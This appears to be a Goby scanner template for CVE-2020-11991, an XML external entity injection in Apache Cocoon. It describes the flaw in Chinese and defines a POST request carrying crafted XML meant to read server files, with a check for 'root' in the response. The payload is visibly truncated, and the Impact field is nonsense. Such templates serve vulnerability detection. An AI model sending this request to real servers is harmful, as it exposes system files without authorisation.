{ "Name": "Apache Cocoon Xml 注入 CVE-2020-11991", "Level": "1", "Tags": [ "XML注入" ], "GobyQuery": "app=\"Apache-Cocoon\"", "Description": "9月11日 Apache 软件基金会发布安全公告，修复了 Apache Cocoon xml外部实体注入漏洞（CVE-2020-11991）。\n\nApache Cocoon 是一个基于 Spring 框架的围绕分离理念建立的构架，在这种框架下的所有处理都被预先定义好的处理组件线性连接起来，能够将输入和产生的输出按照流水线顺序处理。用户群：Apache Lenya、Daisy CMS、Hippo CMS、Mindquarry等等，Apache Cocoon 通常被作为一个数据抽取、转换、加载工具或者是系统之间传输数据的中转站。CVE-2020-11991 与 StreamGenerator 有关，在使用 StreamGenerator 时，代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。\n\nApache Cocoon <= 2.1.12", "Product": "Apache Cocoon", "Homepage": "http://cocoon.apache.org/2.1/", "Author": "PeiQi", "Impact": "

咩咩咩🐑

", "Recommandation": "", "References": [ "http://wiki.peiqi.tech" ], "ScanSteps": [ "AND", { "Request": { "method": "POST", "uri": "/v2/api/product/manger/getInfo", "follow_redirect": true, "header": { "Content-type": "text/xml" }, "data_type": "text", "data": "\n ]>\n\nJohn \n&ent;\n" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "root", "bz": "" } ] }, "SetVariable": [] } ], "PostTime": "2021-01-22 22:24:01", "GobyVersion": "1.8.237" }